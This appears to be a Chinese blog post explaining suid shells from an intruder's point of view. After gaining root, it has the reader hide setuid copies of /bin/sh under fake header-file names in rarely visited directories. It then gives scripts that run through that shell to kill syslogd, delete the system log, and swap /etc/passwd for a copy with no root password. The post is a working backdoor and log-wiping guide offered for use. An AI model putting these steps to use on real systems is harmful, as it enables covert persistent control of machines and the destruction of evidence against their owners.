Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者是root,那你就可能以root的身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写/执行这个shell,而其他用户则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的shell,就可以获得文件拥有者权限;如果文件拥有者是root,那么任何运行了这个shell的用户便可以控制整个系统,如增加用户、修改root口令、清除日志等等。 为什么需要它? 这是一个非常容易回答的问题。当通过某些方法进入系统后,如果系统管理员有一定的水平,会很快发现问题。通常他们会查看日志和修改root口令,你可能就要跟这个系统说再见了。这就是需要suid shell的原因 。:) 怎样才能得到suid shell呢? 首先你要足够狡猾,这取决于你面对的是什么样的系统管理员。当你用尽一切方法,如猜口令、苦难root 、安全漏洞攻击等等,终于成功地取得了root权限,尽快找到一个几乎从未使用过的目录。无论如何,不要将suid shell放在你的主目录下。一个比较好的地方是/usr下的深层子目录,如/usr/X11/include/X11/。这个目录几乎不会有人进去的,而且很少会因存放过多文件而使系统管理员检查里面的文件。另外,suid shell的名字应该尽量与其它文件相似。例如,在这个目录下有sync.h、shape.h等文件,suid shell可以取part.h这种隐蔽性较好的名字。 另一个比较好的地方是将suid shell与其它suid程序放置在一起,如/usr/sbin,并同样取一个隐蔽的名字。 接着,就是在这些目录下创建suid shell了。如: cp /bin/sh /usr/X11/include/X11/extensions/part.h chmod 4755 /usr/X11/include/X11/extensions/part.h 注意,为了使整个过程在最短的时间内完成,应该在进入系统前做好相应准备。最好在尝试攻击前仔细研究系统和计划。另外总是多创建几个suid shell,这样即使其中一个被发现了,仍然有通过使用其它suid shell控制系统的机会。 如何利用suid shell呢? 在许多系统中,往往限制用户所能使用的shell。这个只要检查一下/etc下的相应文件就能知道。在Linux系统中这个文件是/etc/shells,其中列出了所有的shell程序。但你可以用suid shell做任何事!例如,你准备将/etc/passwd改名为/etc/passwd.heh,编写如下脚本即可: #!/usr/X11/include/X11/extensions/part.h mv /etc/passwd /etc/passwd.heh exit (这只是个示例,最好别这样做:)) 上面的例子好象只提供了一个非交互的程序,但只要精心编写脚本,同样可以实现虚拟的“交互”程序。 如果你仍然想真正得到可交互的访问,请阅读以下内容。 首先将/etc/passwd复制到主目录下,编辑它以删除root的加密口令。接着输入"ps ax|grep syslog/'取得syslogd的进程号。现在以/'interactive XX/'(XX是syslogd的进程号)格式运行如下脚本: #!/usr/X11/include/X11/extensions/part.h kill -9 $1 rm -f /var/adm/syslog cp /etc/passwd /etc/passwd.OLD cp ~backend/passwd /etc/passwd chmod 644 /etc/passwd exit 现在可以无须口令就成为root了 一旦完成所要做的”工作“后,记住运行如下脚本,替换回最初的口令文件。 #!/usr/X11/include/X11/extensions/part.h cp /etc/passwd.OLD /etc/passwd chmod 644 /etc/passwd exit Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1645862
什么是Suid shell?
最新推荐文章于 2025-04-21 13:56:14 发布